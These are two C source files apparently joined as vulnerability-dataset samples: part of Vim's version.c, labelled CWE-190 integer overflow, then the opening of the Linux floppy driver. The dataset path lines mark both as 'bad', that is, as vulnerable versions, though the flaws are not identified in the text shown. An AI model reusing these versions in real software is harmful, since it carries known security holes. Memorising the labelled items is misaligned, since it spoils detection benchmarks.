/**/
95,
/**/
94,
/**/
93,
/**/
92,
/**/
91,
/**/
90,
/**/
89,
/**/
88,
/**/
87,
/**/
86,
/**/
85,
/**/
84,
/**/
83,
/**/
82,
/**/
81,
/**/
80,
/**/
79,
/**/
78,
/**/
77,
/**/
76,
/**/
75,
/**/
74,
/**/
73,
/**/
72,
/**/
71,
/**/
70,
/**/
69,
/**/
68,
/**/
67,
/**/
66,
/**/
65,
/**/
64,
/**/
63,
/**/
62,
/**/
61,
/**/
60,
/**/
59,
/**/
58,
/**/
57,
/**/
56,
/**/
55,
/**/
54,
/**/
53,
/**/
52,
/**/
51,
/**/
50,
/**/
49,
/**/
48,
/**/
47,
/**/
46,
/**/
45,
/**/
44,
/**/
43,
/**/
42,
/**/
41,
/**/
40,
/**/
39,
/**/
38,
/**/
37,
/**/
36,
/**/
35,
/**/
34,
/**/
33,
/**/
32,
/**/
31,
/**/
30,
/**/
29,
/**/
28,
/**/
27,
/**/
26,
/**/
25,
/**/
24,
/**/
23,
/**/
22,
/**/
21,
/**/
20,
/**/
19,
/**/
18,
/**/
17,
/**/
16,
/**/
15,
/**/
14,
/**/
13,
/**/
12,
/**/
11,
/**/
10,
/**/
9,
/**/
8,
/**/
7,
/**/
6,
/**/
5,
/**/
4,
/**/
3,
/**/
2,
/**/
1,
/**/
0
};
/*
* Place to put a short description when adding a feature with a patch.
* Keep it short, e.g.,: "relative numbers", "persistent undo".
* Also add a comment marker to separate the lines.
* See the official Vim patches for the diff format: It must use a context of
* one line only. Create it by hand or use "diff -C2" and edit the patch.
*/
static char *(extra_patches[]) =
{ /* Add your patch description below this line */
/**/
NULL
};
int
highest_patch(void)
{
int i;
int h = 0;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] > h)
h = included_patches[i];
return h;
}
#if defined(FEAT_EVAL) || defined(PROTO)
/*
* Return TRUE if patch "n" has been included.
*/
int
has_patch(int n)
{
int i;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] == n)
return TRUE;
return FALSE;
}
#endif
void
ex_version(exarg_T *eap)
{
/*
* Ignore a ":version 9.99" command.
*/
if (*eap->arg == NUL)
{
msg_putchar('\n');
list_version();
}
}
/*
* List all features aligned in columns, dictionary style.
*/
static void
list_features(void)
{
int i;
int ncol;
int nrow;
int nfeat = 0;
int width = 0;
/* Find the length of the longest feature name, use that + 1 as the column
* width */
for (i = 0; features[i] != NULL; ++i)
{
int l = (int)STRLEN(features[i]);
if (l > width)
width = l;
++nfeat;
}
width += 1;
if (Columns < width)
{
/* Not enough screen columns - show one per line */
for (i = 0; features[i] != NULL; ++i)
{
version_msg(features[i]);
if (msg_col > 0)
msg_putchar('\n');
}
return;
}
/* The rightmost column doesn't need a separator.
* Sacrifice it to fit in one more column if possible. */
ncol = (int) (Columns + 1) / width;
nrow = nfeat / ncol + (nfeat % ncol ? 1 : 0);
/* i counts columns then rows. idx counts rows then columns. */
for (i = 0; !got_int && i < nrow * ncol; ++i)
{
int idx = (i / ncol) + (i % ncol) * nrow;
if (idx < nfeat)
{
int last_col = (i + 1) % ncol == 0;
msg_puts((char_u *)features[idx]);
if (last_col)
{
if (msg_col > 0)
msg_putchar('\n');
}
else
{
while (msg_col % width)
msg_putchar(' ');
}
}
else
{
if (msg_col > 0)
msg_putchar('\n');
}
}
}
void
list_version(void)
{
int i;
int first;
char *s = "";
/*
* When adding features here, don't forget to update the list of
* internal variables in eval.c!
*/
MSG(longVersion);
#ifdef WIN3264
# ifdef FEAT_GUI_W32
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit GUI version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit GUI version"));
# endif
# ifdef FEAT_OLE
MSG_PUTS(_(" with OLE support"));
# endif
# else
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit console version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit console version"));
# endif
# endif
#endif
#ifdef MACOS
# ifdef MACOS_X
# ifdef MACOS_X_UNIX
MSG_PUTS(_("\nMacOS X (unix) version"));
# else
MSG_PUTS(_("\nMacOS X version"));
# endif
#else
MSG_PUTS(_("\nMacOS version"));
# endif
#endif
#ifdef VMS
MSG_PUTS(_("\nOpenVMS version"));
# ifdef HAVE_PATHDEF
if (*compiled_arch != NUL)
{
MSG_PUTS(" - ");
MSG_PUTS(compiled_arch);
}
# endif
#endif
/* Print the list of patch numbers if there is at least one. */
/* Print a range when patches are consecutive: "1-10, 12, 15-40, 42-45" */
if (included_patches[0] != 0)
{
MSG_PUTS(_("\nIncluded patches: "));
first = -1;
/* find last one */
for (i = 0; included_patches[i] != 0; ++i)
;
while (--i >= 0)
{
if (first < 0)
first = included_patches[i];
if (i == 0 || included_patches[i - 1] != included_patches[i] + 1)
{
MSG_PUTS(s);
s = ", ";
msg_outnum((long)first);
if (first != included_patches[i])
{
MSG_PUTS("-");
msg_outnum((long)included_patches[i]);
}
first = -1;
}
}
}
/* Print the list of extra patch descriptions if there is at least one. */
if (extra_patches[0] != NULL)
{
MSG_PUTS(_("\nExtra patches: "));
s = "";
for (i = 0; extra_patches[i] != NULL; ++i)
{
MSG_PUTS(s);
s = ", ";
MSG_PUTS(extra_patches[i]);
}
}
#ifdef MODIFIED_BY
MSG_PUTS("\n");
MSG_PUTS(_("Modified by "));
MSG_PUTS(MODIFIED_BY);
#endif
#ifdef HAVE_PATHDEF
if (*compiled_user != NUL || *compiled_sys != NUL)
{
MSG_PUTS(_("\nCompiled "));
if (*compiled_user != NUL)
{
MSG_PUTS(_("by "));
MSG_PUTS(compiled_user);
}
if (*compiled_sys != NUL)
{
MSG_PUTS("@");
MSG_PUTS(compiled_sys);
}
}
#endif
#ifdef FEAT_HUGE
MSG_PUTS(_("\nHuge version "));
#else
# ifdef FEAT_BIG
MSG_PUTS(_("\nBig version "));
# else
# ifdef FEAT_NORMAL
MSG_PUTS(_("\nNormal version "));
# else
# ifdef FEAT_SMALL
MSG_PUTS(_("\nSmall version "));
# else
MSG_PUTS(_("\nTiny version "));
# endif
# endif
# endif
#endif
#ifndef FEAT_GUI
MSG_PUTS(_("without GUI."));
#else
# ifdef FEAT_GUI_GTK
# ifdef USE_GTK3
MSG_PUTS(_("with GTK3 GUI."));
# else
# ifdef FEAT_GUI_GNOME
MSG_PUTS(_("with GTK2-GNOME GUI."));
# else
MSG_PUTS(_("with GTK2 GUI."));
# endif
# endif
# else
# ifdef FEAT_GUI_MOTIF
MSG_PUTS(_("with X11-Motif GUI."));
# else
# ifdef FEAT_GUI_ATHENA
# ifdef FEAT_GUI_NEXTAW
MSG_PUTS(_("with X11-neXtaw GUI."));
# else
MSG_PUTS(_("with X11-Athena GUI."));
# endif
# else
# ifdef FEAT_GUI_PHOTON
MSG_PUTS(_("with Photon GUI."));
# else
# if defined(MSWIN)
MSG_PUTS(_("with GUI."));
# else
# if defined(TARGET_API_MAC_CARBON) && TARGET_API_MAC_CARBON
MSG_PUTS(_("with Carbon GUI."));
# else
# if defined(TARGET_API_MAC_OSX) && TARGET_API_MAC_OSX
MSG_PUTS(_("with Cocoa GUI."));
# else
# if defined(MACOS)
MSG_PUTS(_("with (classic) GUI."));
# endif
# endif
# endif
# endif
# endif
# endif
# endif
# endif
#endif
version_msg(_(" Features included (+) or not (-):\n"));
list_features();
#ifdef SYS_VIMRC_FILE
version_msg(_(" system vimrc file: \""));
version_msg(SYS_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE
version_msg(_(" user vimrc file: \""));
version_msg(USR_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE2
version_msg(_(" 2nd user vimrc file: \""));
version_msg(USR_VIMRC_FILE2);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE3
version_msg(_(" 3rd user vimrc file: \""));
version_msg(USR_VIMRC_FILE3);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE
version_msg(_(" user exrc file: \""));
version_msg(USR_EXRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE2
version_msg(_(" 2nd user exrc file: \""));
version_msg(USR_EXRC_FILE2);
version_msg("\"\n");
#endif
#ifdef FEAT_GUI
# ifdef SYS_GVIMRC_FILE
version_msg(_(" system gvimrc file: \""));
version_msg(SYS_GVIMRC_FILE);
version_msg("\"\n");
# endif
version_msg(_(" user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE);
version_msg("\"\n");
# ifdef USR_GVIMRC_FILE2
version_msg(_("2nd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE2);
version_msg("\"\n");
# endif
# ifdef USR_GVIMRC_FILE3
version_msg(_("3rd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE3);
version_msg("\"\n");
# endif
#endif
version_msg(_(" defaults file: \""));
version_msg(VIM_DEFAULTS_FILE);
version_msg("\"\n");
#ifdef FEAT_GUI
# ifdef SYS_MENU_FILE
version_msg(_(" system menu file: \""));
version_msg(SYS_MENU_FILE);
version_msg("\"\n");
# endif
#endif
#ifdef HAVE_PATHDEF
if (*default_vim_dir != NUL)
{
version_msg(_(" fall-back for $VIM: \""));
version_msg((char *)default_vim_dir);
version_msg("\"\n");
}
if (*default_vimruntime_dir != NUL)
{
version_msg(_(" f-b for $VIMRUNTIME: \""));
version_msg((char *)default_vimruntime_dir);
version_msg("\"\n");
}
version_msg(_("Compilation: "));
version_msg((char *)all_cflags);
version_msg("\n");
#ifdef VMS
if (*compiler_version != NUL)
{
version_msg(_("Compiler: "));
version_msg((char *)compiler_version);
version_msg("\n");
}
#endif
version_msg(_("Linking: "));
version_msg((char *)all_lflags);
#endif
#ifdef DEBUG
version_msg("\n");
version_msg(_(" DEBUG BUILD"));
#endif
}
/*
* Output a string for the version message. If it's going to wrap, output a
* newline, unless the message is too long to fit on the screen anyway.
*/
static void
version_msg(char *s)
{
int len = (int)STRLEN(s);
if (!got_int && len < (int)Columns && msg_col + len >= (int)Columns
&& *s != '\n')
msg_putchar('\n');
if (!got_int)
MSG_PUTS(s);
}
static void do_intro_line(int row, char_u *mesg, int add_version, int attr);
/*
* Show the intro message when not editing a file.
*/
void
maybe_intro_message(void)
{
if (bufempty()
&& curbuf->b_fname == NULL
#ifdef FEAT_WINDOWS
&& firstwin->w_next == NULL
#endif
&& vim_strchr(p_shm, SHM_INTRO) == NULL)
intro_message(FALSE);
}
/*
* Give an introductory message about Vim.
* Only used when starting Vim on an empty file, without a file name.
* Or with the ":intro" command (for Sven :-).
*/
void
intro_message(
int colon) /* TRUE for ":intro" */
{
int i;
int row;
int blanklines;
int sponsor;
char *p;
static char *(lines[]) =
{
N_("VIM - Vi IMproved"),
"",
N_("version "),
N_("by Bram Moolenaar et al."),
#ifdef MODIFIED_BY
" ",
#endif
N_("Vim is open source and freely distributable"),
"",
N_("Help poor children in Uganda!"),
N_("type :help iccf<Enter> for information "),
"",
N_("type :q<Enter> to exit "),
N_("type :help<Enter> or <F1> for on-line help"),
N_("type :help version8<Enter> for version info"),
NULL,
"",
N_("Running in Vi compatible mode"),
N_("type :set nocp<Enter> for Vim defaults"),
N_("type :help cp-default<Enter> for info on this"),
};
#ifdef FEAT_GUI
static char *(gui_lines[]) =
{
NULL,
NULL,
NULL,
NULL,
#ifdef MODIFIED_BY
NULL,
#endif
NULL,
NULL,
NULL,
N_("menu Help->Orphans for information "),
NULL,
N_("Running modeless, typed text is inserted"),
N_("menu Edit->Global Settings->Toggle Insert Mode "),
N_(" for two modes "),
NULL,
NULL,
NULL,
N_("menu Edit->Global Settings->Toggle Vi Compatible"),
N_(" for Vim defaults "),
};
#endif
/* blanklines = screen height - # message lines */
blanklines = (int)Rows - ((sizeof(lines) / sizeof(char *)) - 1);
if (!p_cp)
blanklines += 4; /* add 4 for not showing "Vi compatible" message */
#ifdef FEAT_WINDOWS
/* Don't overwrite a statusline. Depends on 'cmdheight'. */
if (p_ls > 1)
blanklines -= Rows - topframe->fr_height;
#endif
if (blanklines < 0)
blanklines = 0;
/* Show the sponsor and register message one out of four times, the Uganda
* message two out of four times. */
sponsor = (int)time(NULL);
sponsor = ((sponsor & 2) == 0) - ((sponsor & 4) == 0);
/* start displaying the message lines after half of the blank lines */
row = blanklines / 2;
if ((row >= 2 && Columns >= 50) || colon)
{
for (i = 0; i < (int)(sizeof(lines) / sizeof(char *)); ++i)
{
p = lines[i];
#ifdef FEAT_GUI
if (p_im && gui.in_use && gui_lines[i] != NULL)
p = gui_lines[i];
#endif
if (p == NULL)
{
if (!p_cp)
break;
continue;
}
if (sponsor != 0)
{
if (strstr(p, "children") != NULL)
p = sponsor < 0
? N_("Sponsor Vim development!")
: N_("Become a registered Vim user!");
else if (strstr(p, "iccf") != NULL)
p = sponsor < 0
? N_("type :help sponsor<Enter> for information ")
: N_("type :help register<Enter> for information ");
else if (strstr(p, "Orphans") != NULL)
p = N_("menu Help->Sponsor/Register for information ");
}
if (*p != NUL)
do_intro_line(row, (char_u *)_(p), i == 2, 0);
++row;
}
}
/* Make the wait-return message appear just below the text. */
if (colon)
msg_row = row;
}
static void
do_intro_line(
int row,
char_u *mesg,
int add_version,
int attr)
{
char_u vers[20];
int col;
char_u *p;
int l;
int clen;
#ifdef MODIFIED_BY
# define MODBY_LEN 150
char_u modby[MODBY_LEN];
if (*mesg == ' ')
{
vim_strncpy(modby, (char_u *)_("Modified by "), MODBY_LEN - 1);
l = (int)STRLEN(modby);
vim_strncpy(modby + l, (char_u *)MODIFIED_BY, MODBY_LEN - l - 1);
mesg = modby;
}
#endif
/* Center the message horizontally. */
col = vim_strsize(mesg);
if (add_version)
{
STRCPY(vers, mediumVersion);
if (highest_patch())
{
/* Check for 9.9x or 9.9xx, alpha/beta version */
if (isalpha((int)vers[3]))
{
int len = (isalpha((int)vers[4])) ? 5 : 4;
sprintf((char *)vers + len, ".%d%s", highest_patch(),
mediumVersion + len);
}
else
sprintf((char *)vers + 3, ".%d", highest_patch());
}
col += (int)STRLEN(vers);
}
col = (Columns - col) / 2;
if (col < 0)
col = 0;
/* Split up in parts to highlight <> items differently. */
for (p = mesg; *p != NUL; p += l)
{
clen = 0;
for (l = 0; p[l] != NUL
&& (l == 0 || (p[l] != '<' && p[l - 1] != '>')); ++l)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
{
clen += ptr2cells(p + l);
l += (*mb_ptr2len)(p + l) - 1;
}
else
#endif
clen += byte2cells(p[l]);
}
screen_puts_len(p, l, row, col, *p == '<' ? hl_attr(HLF_8) : attr);
col += clen;
}
/* Add the version number to the version line. */
if (add_version)
screen_puts(vers, row, col, 0);
}
/*
* ":intro": clear screen, display intro screen and wait for return.
*/
void
ex_intro(exarg_T *eap UNUSED)
{
screenclear();
intro_message(TRUE);
wait_return(TRUE);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3179_1 |
crossvul-cpp_data_bad_966_0 | // SPDX-License-Identifier: GPL-2.0-only
/*
* linux/drivers/block/floppy.c
*
* Copyright (C) 1991, 1992 Linus Torvalds
* Copyright (C) 1993, 1994 Alain Knaff
* Copyright (C) 1998 Alan Cox
*/
/*
* 02.12.91 - Changed to static variables to indicate need for reset
* and recalibrate. This makes some things easier (output_byte reset
* checking etc), and means less interrupt jumping in case of errors,
* so the code is hopefully easier to understand.
*/
/*
* This file is certainly a mess. I've tried my best to get it working,
* but I don't like programming floppies, and I have only one anyway.
* Urgel. I should check for more errors, and do more graceful error
* recovery. Seems there are problems with several drives. I've tried to
* correct them. No promises.
*/
/*
* As with hd.c, all routines within this file can (and will) be called
* by interrupts, so extreme caution is needed. A hardware interrupt
* handler may not sleep, or a kernel panic will happen. Thus I cannot
* call "floppy-on" directly, but have to set a special timer interrupt
* etc.
*/
/*
* 28.02.92 - made track-buffering routines, based on the routines written
* by entropy@wintermute.wpi.edu (Lawrence Foard). Linus.
*/
/*
* Automatic floppy-detection and formatting written by Werner Almesberger
* (almesber@nessie.cs.id.ethz.ch), who also corrected some problems with
* the floppy-change signal detection.
*/
/*
* 1992/7/22 -- Hennus Bergman: Added better error reporting, fixed
* FDC data overrun bug, added some preliminary stuff for vertical
* recording support.
*
* 1992/9/17: Added DMA allocation & DMA functions. -- hhb.
*
* TODO: Errors are still not counted properly.
*/
/* 1992/9/20
* Modifications for ``Sector Shifting'' by Rob Hooft (hooft@chem.ruu.nl)
* modeled after the freeware MS-DOS program fdformat/88 V1.8 by
* Christoph H. Hochst\"atter.
* I have fixed the shift values to the ones I always use. Maybe a new
* ioctl() should be created to be able to modify them.
* There is a bug in the driver that makes it impossible to format a
* floppy as the first thing after bootup.
*/
/*
* 1993/4/29 -- Linus -- cleaned up the timer handling in the kernel, and
* this helped the floppy driver as well. Much cleaner, and still seems to
* work.
*/
/* 1994/6/24 --bbroad-- added the floppy table entries and made
* minor modifications to allow 2.88 floppies to be run.
*/
/* 1994/7/13 -- Paul Vojta -- modified the probing code to allow three or more
* disk types.
*/
/*
* 1994/8/8 -- Alain Knaff -- Switched to fdpatch driver: Support for bigger
* format bug fixes, but unfortunately some new bugs too...
*/
/* 1994/9/17 -- Koen Holtman -- added logging of physical floppy write
* errors to allow safe writing by specialized programs.
*/
/* 1995/4/24 -- Dan Fandrich -- added support for Commodore 1581 3.5" disks
* by defining bit 1 of the "stretch" parameter to mean put sectors on the
* opposite side of the disk, leaving the sector IDs alone (i.e. Commodore's
* drives are "upside-down").
*/
/*
* 1995/8/26 -- Andreas Busse -- added Mips support.
*/
/*
* 1995/10/18 -- Ralf Baechle -- Portability cleanup; move machine dependent
* features to asm/floppy.h.
*/
/*
* 1998/1/21 -- Richard Gooch <rgooch@atnf.csiro.au> -- devfs support
*/
/*
* 1998/05/07 -- Russell King -- More portability cleanups; moved definition of
* interrupt and dma channel to asm/floppy.h. Cleaned up some formatting &
* use of '0' for NULL.
*/
/*
* 1998/06/07 -- Alan Cox -- Merged the 2.0.34 fixes for resource allocation
* failures.
*/
/*
* 1998/09/20 -- David Weinehall -- Added slow-down code for buggy PS/2-drives.
*/
/*
* 1999/08/13 -- Paul Slootman -- floppy stopped working on Alpha after 24
* days, 6 hours, 32 minutes and 32 seconds (i.e. MAXINT jiffies; ints were
* being used to store jiffies, which are unsigned longs).
*/
/*
* 2000/08/28 -- Arnaldo Carvalho de Melo <acme@conectiva.com.br>
* - get rid of check_region
* - s/suser/capable/
*/
/*
* 2001/08/26 -- Paul Gortmaker - fix insmod oops on machines with no
* floppy controller (lingering task on list after module is gone... boom.)
*/
/*
* 2002/02/07 -- Anton Altaparmakov - Fix io ports reservation to correct range
* (0x3f2-0x3f5, 0x3f7). This fix is a bit of a hack but the proper fix
* requires many non-obvious changes in arch dependent code.
*/
/* 2003/07/28 -- Daniele Bellucci <bellucda@tiscali.it>.
* Better audit of register_blkdev.
*/
#undef FLOPPY_SILENT_DCL_CLEAR
#define REALLY_SLOW_IO
#define DEBUGT 2
#define DPRINT(format, args...) \
pr_info("floppy%d: " format, current_drive, ##args)
#define DCL_DEBUG /* debug disk change line */
#ifdef DCL_DEBUG
#define debug_dcl(test, fmt, args...) \
do { if ((test) & FD_DEBUG) DPRINT(fmt, ##args); } while (0)
#else
#define debug_dcl(test, fmt, args...) \
do { if (0) DPRINT(fmt, ##args); } while (0)
#endif
/* do print messages for unexpected interrupts */
static int print_unex = 1;
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/timer.h>
#include <linux/workqueue.h>
#define FDPATCHES
#include <linux/fdreg.h>
#include <linux/fd.h>
#include <linux/hdreg.h>
#include <linux/errno.h>
#include <linux/slab.h>
#include <linux/mm.h>
#include <linux/bio.h>
#include <linux/string.h>
#include <linux/jiffies.h>
#include <linux/fcntl.h>
#include <linux/delay.h>
#include <linux/mc146818rtc.h> /* CMOS defines */
#include <linux/ioport.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/mod_devicetable.h>
#include <linux/mutex.h>
#include <linux/io.h>
#include <linux/uaccess.h>
#include <linux/async.h>
#include <linux/compat.h>
/*
* PS/2 floppies have much slower step rates than regular floppies.
* It's been recommended that take about 1/4 of the default speed
* in some more extreme cases.
*/
static DEFINE_MUTEX(floppy_mutex);
static int slow_floppy;
#include <asm/dma.h>
#include <asm/irq.h>
static int FLOPPY_IRQ = 6;
static int FLOPPY_DMA = 2;
static int can_use_virtual_dma = 2;
/* =======
* can use virtual DMA:
* 0 = use of virtual DMA disallowed by config
* 1 = use of virtual DMA prescribed by config
* 2 = no virtual DMA preference configured. By default try hard DMA,
* but fall back on virtual DMA when not enough memory available
*/
static int use_virtual_dma;
/* =======
* use virtual DMA
* 0 using hard DMA
* 1 using virtual DMA
* This variable is set to virtual when a DMA mem problem arises, and
* reset back in floppy_grab_irq_and_dma.
* It is not safe to reset it in other circumstances, because the floppy
* driver may have several buffers in use at once, and we do currently not
* record each buffers capabilities
*/
static DEFINE_SPINLOCK(floppy_lock);
static unsigned short virtual_dma_port = 0x3f0;
irqreturn_t floppy_interrupt(int irq, void *dev_id);
static int set_dor(int fdc, char mask, char data);
#define K_64 0x10000 /* 64KB */
/* the following is the mask of allowed drives. By default units 2 and
* 3 of both floppy controllers are disabled, because switching on the
* motor of these drives causes system hangs on some PCI computers. drive
* 0 is the low bit (0x1), and drive 7 is the high bit (0x80). Bits are on if
* a drive is allowed.
*
* NOTE: This must come before we include the arch floppy header because
* some ports reference this variable from there. -DaveM
*/
static int allowed_drive_mask = 0x33;
#include <asm/floppy.h>
static int irqdma_allocated;
#include <linux/blk-mq.h>
#include <linux/blkpg.h>
#include <linux/cdrom.h> /* for the compatibility eject ioctl */
#include <linux/completion.h>
static LIST_HEAD(floppy_reqs);
static struct request *current_req;
static int set_next_request(void);
#ifndef fd_get_dma_residue
#define fd_get_dma_residue() get_dma_residue(FLOPPY_DMA)
#endif
/* Dma Memory related stuff */
#ifndef fd_dma_mem_free
#define fd_dma_mem_free(addr, size) free_pages(addr, get_order(size))
#endif
#ifndef fd_dma_mem_alloc
#define fd_dma_mem_alloc(size) __get_dma_pages(GFP_KERNEL, get_order(size))
#endif
#ifndef fd_cacheflush
#define fd_cacheflush(addr, size) /* nothing... */
#endif
static inline void fallback_on_nodma_alloc(char **addr, size_t l)
{
#ifdef FLOPPY_CAN_FALLBACK_ON_NODMA
if (*addr)
return; /* we have the memory */
if (can_use_virtual_dma != 2)
return; /* no fallback allowed */
pr_info("DMA memory shortage. Temporarily falling back on virtual DMA\n");
*addr = (char *)nodma_mem_alloc(l);
#else
return;
#endif
}
/* End dma memory related stuff */
static unsigned long fake_change;
static bool initialized;
#define ITYPE(x) (((x) >> 2) & 0x1f)
#define TOMINOR(x) ((x & 3) | ((x & 4) << 5))
#define UNIT(x) ((x) & 0x03) /* drive on fdc */
#define FDC(x) (((x) & 0x04) >> 2) /* fdc of drive */
/* reverse mapping from unit and fdc to drive */
#define REVDRIVE(fdc, unit) ((unit) + ((fdc) << 2))
#define DP (&drive_params[current_drive])
#define DRS (&drive_state[current_drive])
#define DRWE (&write_errors[current_drive])
#define FDCS (&fdc_state[fdc])
#define UDP (&drive_params[drive])
#define UDRS (&drive_state[drive])
#define UDRWE (&write_errors[drive])
#define UFDCS (&fdc_state[FDC(drive)])
#define PH_HEAD(floppy, head) (((((floppy)->stretch & 2) >> 1) ^ head) << 2)
#define STRETCH(floppy) ((floppy)->stretch & FD_STRETCH)
/* read/write */
#define COMMAND (raw_cmd->cmd[0])
#define DR_SELECT (raw_cmd->cmd[1])
#define TRACK (raw_cmd->cmd[2])
#define HEAD (raw_cmd->cmd[3])
#define SECTOR (raw_cmd->cmd[4])
#define SIZECODE (raw_cmd->cmd[5])
#define SECT_PER_TRACK (raw_cmd->cmd[6])
#define GAP (raw_cmd->cmd[7])
#define SIZECODE2 (raw_cmd->cmd[8])
#define NR_RW 9
/* format */
#define F_SIZECODE (raw_cmd->cmd[2])
#define F_SECT_PER_TRACK (raw_cmd->cmd[3])
#define F_GAP (raw_cmd->cmd[4])
#define F_FILL (raw_cmd->cmd[5])
#define NR_F 6
/*
* Maximum disk size (in kilobytes).
* This default is used whenever the current disk size is unknown.
* [Now it is rather a minimum]
*/
#define MAX_DISK_SIZE 4 /* 3984 */
/*
* globals used by 'result()'
*/
#define MAX_REPLIES 16
static unsigned char reply_buffer[MAX_REPLIES];
static int inr; /* size of reply buffer, when called from interrupt */
#define ST0 (reply_buffer[0])
#define ST1 (reply_buffer[1])
#define ST2 (reply_buffer[2])
#define ST3 (reply_buffer[0]) /* result of GETSTATUS */
#define R_TRACK (reply_buffer[3])
#define R_HEAD (reply_buffer[4])
#define R_SECTOR (reply_buffer[5])
#define R_SIZECODE (reply_buffer[6])
#define SEL_DLY (2 * HZ / 100)
/*
* this struct defines the different floppy drive types.
*/
static struct {
struct floppy_drive_params params;
const char *name; /* name printed while booting */
} default_drive_params[] = {
/* NOTE: the time values in jiffies should be in msec!
CMOS drive type
| Maximum data rate supported by drive type
| | Head load time, msec
| | | Head unload time, msec (not used)
| | | | Step rate interval, usec
| | | | | Time needed for spinup time (jiffies)
| | | | | | Timeout for spinning down (jiffies)
| | | | | | | Spindown offset (where disk stops)
| | | | | | | | Select delay
| | | | | | | | | RPS
| | | | | | | | | | Max number of tracks
| | | | | | | | | | | Interrupt timeout
| | | | | | | | | | | | Max nonintlv. sectors
| | | | | | | | | | | | | -Max Errors- flags */
{{0, 500, 16, 16, 8000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 80, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 7, 4, 8, 2, 1, 5, 3,10}, 3*HZ/2, 0 }, "unknown" },
{{1, 300, 16, 16, 8000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 40, 3*HZ, 17, {3,1,2,0,2}, 0,
0, { 1, 0, 0, 0, 0, 0, 0, 0}, 3*HZ/2, 1 }, "360K PC" }, /*5 1/4 360 KB PC*/
{{2, 500, 16, 16, 6000, 4*HZ/10, 3*HZ, 14, SEL_DLY, 6, 83, 3*HZ, 17, {3,1,2,0,2}, 0,
0, { 2, 5, 6,23,10,20,12, 0}, 3*HZ/2, 2 }, "1.2M" }, /*5 1/4 HD AT*/
{{3, 250, 16, 16, 3000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 83, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 4,22,21,30, 3, 0, 0, 0}, 3*HZ/2, 4 }, "720k" }, /*3 1/2 DD*/
{{4, 500, 16, 16, 4000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 7, 4,25,22,31,21,29,11}, 3*HZ/2, 7 }, "1.44M" }, /*3 1/2 HD*/
{{5, 1000, 15, 8, 3000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 40, {3,1,2,0,2}, 0,
0, { 7, 8, 4,25,28,22,31,21}, 3*HZ/2, 8 }, "2.88M AMI BIOS" }, /*3 1/2 ED*/
{{6, 1000, 15, 8, 3000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 40, {3,1,2,0,2}, 0,
0, { 7, 8, 4,25,28,22,31,21}, 3*HZ/2, 8 }, "2.88M" } /*3 1/2 ED*/
/* | --autodetected formats--- | | |
* read_track | | Name printed when booting
* | Native format
* Frequency of disk change checks */
};
static struct floppy_drive_params drive_params[N_DRIVE];
static struct floppy_drive_struct drive_state[N_DRIVE];
static struct floppy_write_errors write_errors[N_DRIVE];
static struct timer_list motor_off_timer[N_DRIVE];
static struct gendisk *disks[N_DRIVE];
static struct blk_mq_tag_set tag_sets[N_DRIVE];
static struct block_device *opened_bdev[N_DRIVE];
static DEFINE_MUTEX(open_lock);
static struct floppy_raw_cmd *raw_cmd, default_raw_cmd;
/*
* This struct defines the different floppy types.
*
* Bit 0 of 'stretch' tells if the tracks need to be doubled for some
* types (e.g. 360kB diskette in 1.2MB drive, etc.). Bit 1 of 'stretch'
* tells if the disk is in Commodore 1581 format, which means side 0 sectors
* are located on side 1 of the disk but with a side 0 ID, and vice-versa.
* This is the same as the Sharp MZ-80 5.25" CP/M disk format, except that the
* 1581's logical side 0 is on physical side 1, whereas the Sharp's logical
* side 0 is on physical side 0 (but with the misnamed sector IDs).
* 'stretch' should probably be renamed to something more general, like
* 'options'.
*
* Bits 2 through 9 of 'stretch' tell the number of the first sector.
* The LSB (bit 2) is flipped. For most disks, the first sector
* is 1 (represented by 0x00<<2). For some CP/M and music sampler
* disks (such as Ensoniq EPS 16plus) it is 0 (represented as 0x01<<2).
* For Amstrad CPC disks it is 0xC1 (represented as 0xC0<<2).
*
* Other parameters should be self-explanatory (see also setfdprm(8)).
*/
/*
Size
| Sectors per track
| | Head
| | | Tracks
| | | | Stretch
| | | | | Gap 1 size
| | | | | | Data rate, | 0x40 for perp
| | | | | | | Spec1 (stepping rate, head unload
| | | | | | | | /fmt gap (gap2) */
static struct floppy_struct floppy_type[32] = {
{ 0, 0,0, 0,0,0x00,0x00,0x00,0x00,NULL }, /* 0 no testing */
{ 720, 9,2,40,0,0x2A,0x02,0xDF,0x50,"d360" }, /* 1 360KB PC */
{ 2400,15,2,80,0,0x1B,0x00,0xDF,0x54,"h1200" }, /* 2 1.2MB AT */
{ 720, 9,1,80,0,0x2A,0x02,0xDF,0x50,"D360" }, /* 3 360KB SS 3.5" */
{ 1440, 9,2,80,0,0x2A,0x02,0xDF,0x50,"D720" }, /* 4 720KB 3.5" */
{ 720, 9,2,40,1,0x23,0x01,0xDF,0x50,"h360" }, /* 5 360KB AT */
{ 1440, 9,2,80,0,0x23,0x01,0xDF,0x50,"h720" }, /* 6 720KB AT */
